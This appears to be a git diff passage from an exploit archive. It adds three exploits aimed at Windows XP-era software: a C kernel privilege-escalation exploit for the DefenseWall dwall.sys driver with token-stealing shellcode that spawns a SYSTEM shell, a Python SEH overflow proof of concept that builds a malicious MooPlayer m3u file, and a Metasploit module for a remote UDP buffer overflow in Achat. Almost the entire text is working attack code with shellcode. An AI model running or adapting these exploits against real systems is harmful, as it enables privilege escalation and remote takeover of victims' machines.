+} SYSTEM_INFORMATION_CLASS;
+
+typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
+     SYSTEM_INFORMATION_CLASS SystemInformationClass,
+     PVOID SystemInformation,
+     ULONG SystemInformationLength,
+     PULONG ReturnLength);
+
+typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(
+     DWORD ProfileSource, 
+     PULONG Interval);
+
+typedef void (*FUNCTPTR)(); 
+
+
+
+// Windows XP SP3
+
+#define XP_KPROCESS 0x44      // Offset to _KPROCESS from a _ETHREAD struct
+#define XP_TOKEN    0xc8      // Offset to TOKEN from the _EPROCESS struct
+#define XP_UPID     0x84      // Offset to UniqueProcessId FROM the _EPROCESS struct
+#define XP_APLINKS  0x88      // Offset to ActiveProcessLinks _EPROCESS struct
+
+
+BYTE token_steal_xp[] =
+{
+  0x52,                                                  // push edx                       Save edx on the stack
+  0x53,	                                                 // push ebx                       Save ebx on the stack
+  0x33,0xc0,                                             // xor eax, eax                   eax = 0
+  0x64,0x8b,0x80,0x24,0x01,0x00,0x00,                    // mov eax, fs:[eax+124h]         Retrieve ETHREAD
+  0x8b,0x40,XP_KPROCESS,                                 // mov eax, [eax+XP_KPROCESS]     Retrieve _KPROCESS
+  0x8b,0xc8,                                             // mov ecx, eax
+  0x8b,0x98,XP_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+XP_TOKEN]        Retrieves TOKEN
+  0x8b,0x80,XP_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+XP_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
+  0x81,0xe8,XP_APLINKS,0x00,0x00,0x00,                   // sub eax, XP_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+  0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+XP_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
+  0x75,0xe8,                                             // jne                     ---- 
+  0x8b,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+XP_TOKEN]        Retrieves TOKEN and stores on EDX
+  0x8b,0xc1,                                             // mov eax, ecx                   Retrieves KPROCESS stored on ECX
+  0x89,0x90,XP_TOKEN,0x00,0x00,0x00,                     // mov [eax+XP_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
+  0x5b,                                                  // pop ebx                        Restores ebx
+  0x5a,                                                  // pop edx                        Restores edx
+  0xc2,0x08                                              // ret 8                          Away from the kernel    
+};
+
+
+
+DWORD HalDispatchTableAddress() 
+{
+    _NtQuerySystemInformation    NtQuerySystemInformation;
+    PSYSTEM_MODULE_INFORMATION   pModuleInfo;
+    DWORD                        HalDispatchTable;
+    CHAR                         kFullName[256];
+    PVOID                        kBase = NULL;
+    LPSTR                        kName;
+    HMODULE                      Kernel;
+    FUNCTPTR                     Hal;
+    ULONG                        len;
+    NTSTATUS                     status;
+
+
+    NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
+ 	
+    if (!NtQuerySystemInformation)
+    {
+        printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
+        return -1;  
+    }
+
+    status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
+
+    if (!status) 
+    {
+        printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);
+        return -1;
+    }
+		
+    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
+
+    if(pModuleInfo == NULL)
+    {
+        printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");
+        return -1;
+    }
+
+    status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
+	
+    memset(kFullName, 0x00, sizeof(kFullName));
+    strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
+    kBase = pModuleInfo->Module[0].Base;
+
+    printf("[i] Kernel base name %s\n", kFullName);
+    kName = strrchr(kFullName, '\\');
+
+    Kernel = LoadLibraryA(++kName);
+
+    if(Kernel == NULL) 
+    {
+        printf("[-] Failed to load kernel base\n\n");
+        return -1;
+    }
+
+    Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");
+
+    if(Hal == NULL)
+    {
+        printf("[-] Failed to find HalDispatchTable\n\n");
+        return -1;
+    }
+    
+    printf("[i] HalDispatchTable address 0x%08x\n", Hal);	
+    printf("[i] Kernel handle 0x%08x\n", Kernel);
+    printf("[i] Kernel base address 0x%08x\n", kBase);          
+
+    HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);
+
+    printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);
+
+    if(!HalDispatchTable)
+    {
+        printf("[-] Failed to calculate HalDispatchTable\n\n");
+        return -1;
+    }
+
+    return HalDispatchTable;
+}
+
+
+int GetWindowsVersion()
+{
+    int v = 0;
+    DWORD version = 0, minVersion = 0, majVersion = 0;
+
+    version = GetVersion();
+
+    minVersion = (DWORD)(HIBYTE(LOWORD(version)));
+    majVersion = (DWORD)(LOBYTE(LOWORD(version)));
+
+    if (minVersion == 1 && majVersion == 5) v = 1;  // "Windows XP;
+    if (minVersion == 1 && majVersion == 6) v = 2;  // "Windows 7";
+    if (minVersion == 2 && majVersion == 5) v = 3;  // "Windows Server 2003;
+
+    return v;
+}
+
+
+void spawnShell()
+{
+    STARTUPINFOA si;
+    PROCESS_INFORMATION pi;
+
+
+    ZeroMemory(&pi, sizeof(pi));
+    ZeroMemory(&si, sizeof(si));
+    si.cb = sizeof(si);
+
+    si.cb          = sizeof(si); 
+    si.dwFlags     = STARTF_USESHOWWINDOW;
+    si.wShowWindow = SW_SHOWNORMAL;
+
+    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
+    {
+        printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
+        return;
+    }
+
+    CloseHandle(pi.hThread);
+    CloseHandle(pi.hProcess);
+}
+
+
+
+int main(int argc, char *argv[]) 
+{
+
+    _NtQueryIntervalProfile     NtQueryIntervalProfile;
+    LPVOID                      input[1] = {0};    
+    LPVOID                      addrtoshell;
+    HANDLE                      hDevice;
+    DWORD                       dwRetBytes = 0;
+    DWORD                       HalDispatchTableTarget;
+    ULONG                       time = 0;
+    unsigned char               devhandle[MAX_PATH]; 
+
+
+    printf("-------------------------------------------------------------------------------\n");
+    printf("    SoftSphere DefenseWall FW/HIPS (dwall.sys) Arbitrary Write EoP Exploit     \n");
+    printf("                         Tested on Windows XP SP3 (32bit)                      \n");
+    printf("-------------------------------------------------------------------------------\n\n");
+
+    if (GetWindowsVersion() == 1) 
+    {
+        printf("[i] Running Windows XP\n");
+    }
+
+    if (GetWindowsVersion() == 0) 
+    {
+        printf("[i] Exploit not supported on this OS\n\n");
+        return -1;
+    }  
+
+    sprintf(devhandle, "\\\\.\\%s", "dwall");
+
+    NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");
+ 	
+    if (!NtQueryIntervalProfile)
+    {
+        printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");
+        return -1;  
+    }
+   
+    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+
+    if(addrtoshell == NULL)
+    {
+        printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());
+        return -1;
+    }
+    printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);
+
+    memset(addrtoshell, 0x90, BUFSIZE);
+    memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));
+    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
+
+    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+    
+    if (hDevice == INVALID_HANDLE_VALUE)
+    {
+        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
+        return -1;
+    }
+    else 
+    {
+        printf("[+] Open %s device successful\n", devhandle);
+    }
+
+    HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);
+    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);
+
+    input[0] = addrtoshell;  // input buffer contents gets written to our output buffer address
+                    
+    printf("[+] Input buffer contents %08x\n", input[0]);
+ 	
+    printf("[~] Press any key to send Exploit  . . .\n");
+    getch();
+
+    DeviceIoControl(hDevice, 0x00222000, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);
+
+    printf("[+] Buffer sent\n");
+    CloseHandle(hDevice);
+
+    printf("[+] Spawning SYSTEM Shell\n");
+    NtQueryIntervalProfile(2, &time);
+    spawnShell();
+
+    return 0;
+}
diff --git a/platforms/windows/local/36053.py b/platforms/windows/local/36053.py
new file mode 100755
index 000000000..2a8acc66c
--- /dev/null
+++ b/platforms/windows/local/36053.py
@@ -0,0 +1,40 @@
+#!/usr/bin/env python
+#################################################################
+# Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow      #
+# Date Discovered: 10-02-2015                                   #
+# Author: dogo h@ck                                             #
+# Vulnerable Software: Moo player 1.3.0                         #
+# Software Link: https://mooplayer.jaleco.com/                  #
+# Version: 1.3.0                                                #
+# Tested On: Windows XP SP3                                     #
+#################################################################
+#BadCharacters = ("\x00\x0a\x0d")                               #
+#################################################################
+
+head="http://"
+buffer=10000
+junk = "\x41" * 264
+nseh = "\xeb\x06\x90\x90" 
+seh = "\xe2\x69\xc8\x74"  #74C869E2 OLEACC.dll || Path=C:\WINDOWS\system32\OLEACC.dll
+
+# Windows XP SP3 English MessageBoxA Shellcode
+
+shellcode = ("\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
+"\x51\x68\x6c\x6c\x20\x20\x68\x33"
+"\x32\x2e\x64\x68\x75\x73\x65\x72"
+"\x89\xe1\xbb\x7b\x1d\x80\x7c\x51" # 0x7c801d7b ; LoadLibraryA(user32.dll)
+"\xff\xd3\xb9\x5e\x67\x30\xef\x81"
+"\xc1\x11\x11\x11\x11\x51\x68\x61"
+"\x67\x65\x42\x68\x4d\x65\x73\x73"
+"\x89\xe1\x51\x50\xbb\x40\xae\x80" # 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA)
+"\x7c\xff\xd3\x89\xe1\x31\xd2\x52"
+"\x51\x51\x52\xff\xd0\x31\xc0\x50"
+"\xb8\x12\xcb\x81\x7c\xff\xd0")
+
+poc = head + junk + nseh + seh + shellcode
+junk1 = "\x44"*(buffer-len(poc))
+poc += junk1
+file = "payload.m3u"
+f=open(file,"w")
+f.write(head + poc);
+f.close();
\ No newline at end of file
diff --git a/platforms/windows/remote/36056.rb b/platforms/windows/remote/36056.rb
new file mode 100755
index 000000000..47e69ee0c
--- /dev/null
+++ b/platforms/windows/remote/36056.rb
@@ -0,0 +1,131 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Achat v0.150 beta7 Buffer Overflow',
+      'Description'    => %q{
+        This module exploits an unicode SEH based stack buffer overflow in Achat v0.150. By
+        sending a crafted message to the default port 9256 it's possible to overwrites the
+        SEH handler. Even when the exploit is reliable it depends of timing since there are
+        two threads overflowing the stack in the same time. This module has been tested on
+        Windows XP SP3 and Windows 7.
+      },
+      'Author'         =>
+        [
+          'Peter Kasza <peter.kasza[at]itinsight.hu>', # Vulnerability discovery
+          'Balazs Bucsay <balazs.bucsay[at]rycon.hu>' # Exploit, Metasploit module
+        ],
+      'License'	       => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CWE', '121'],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'    => 730,
+          'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
+          'StackAdjustment' => -3500,
+          'EncoderType'    => Msf::Encoder::Type::AlphanumUnicodeMixed,
+          'EncoderOptions'  =>
+            {
+              'BufferRegister' => 'EAX'
+            }
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          # Tested OK Windows XP SP3, Windows 7
+          # Not working on Windows Server 2003
+          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => "\x2A\x46" } ] #ppr from AChat.exe
+        ],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Dec 18 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(9256)
+      ], self.class)
+  end
+
+  def exploit
+    connect_udp
+
+    # 0055 00          ADD BYTE PTR SS:[EBP],DL # padding
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # padding
+    # 55               PUSH EBP                 # ebp holds a close pointer to the payload
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # mov eax, ebp
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 05 00140011      ADD EAX,11001400         # adjusting eax
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 50               PUSH EAX                 # eax points to the start of the shellcode
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # padding
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 59               POP ECX                  # padding
+    # 0039             ADD BYTE PTR DS:[ECX],BH # padding
+    first_stage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
+
+    sploit = 'A0000000002#Main' + "\x00" + 'Z' * 114688 + "\x00" + "A" * 10 + "\x00"
+    sploit << 'A0000000002#Main' + "\x00" + 'A' * 57288 + 'AAAAASI' * 50 + 'A' * (3750 - 46)
+    sploit << "\x62" + 'A' * 45 # 0x62 will be used to calculate the right offset
+    sploit << "\x61\x40" # POPAD + INC EAX
+
+    sploit << target.ret # AChat.exe p/p/r address
+
+    # adjusting the first thread's unicode payload, tricky asm-fu
+    # the first seh exception jumps here, first_stage variable will be executed
+    # by the second seh exception as well. It needs to be in sync with the second
+    # thread, so that is why we adjust eax/ebp to have a close pointer to the
+    # payload, then first_stage variable will take the rest of the job.
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 55               PUSH EBP                 # ebp with close pointer to payload
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 58               POP EAX                  # put ebp to eax
+    # 006E 00          ADD BYTE PTR DS:[ESI],CH # padding
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # setting eax to the right place
+    # 2A00             SUB AL,BYTE PTR DS:[EAX] # adjusting eax a little bit more
+    # 05 00140011      ADD EAX,11001400         # more adjusting
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 2D 00130011      SUB EAX,11001300         # lea eax, eax+100
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 50               PUSH EAX			# saving eax
+    # 0043 00          ADD BYTE PTR DS:[EBX],AL # padding
+    # 5D               POP EBP			# mov ebp, eax
+    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + 'C' * 9 + "\x60\x43"
+    sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
+    sploit << "\x2A" + first_stage + 'C' * (157 - first_stage.length - 31 -3) # put address of the payload to EAX
+    sploit << payload.encoded + 'A' * (1152 - payload.encoded.length) # placing the payload
+    sploit << "\x00" + 'A' * 10 + "\x00"
+
+    i = 0
+    while i < sploit.length do
+      if i > 172000
+        Rex::sleep(1.0)
+      end
+      sent = udp_sock.put(sploit[i..i + 8192 - 1])
+      i += sent
+    end
+    disconnect_udp
+  end
+
+end
\ No newline at end of file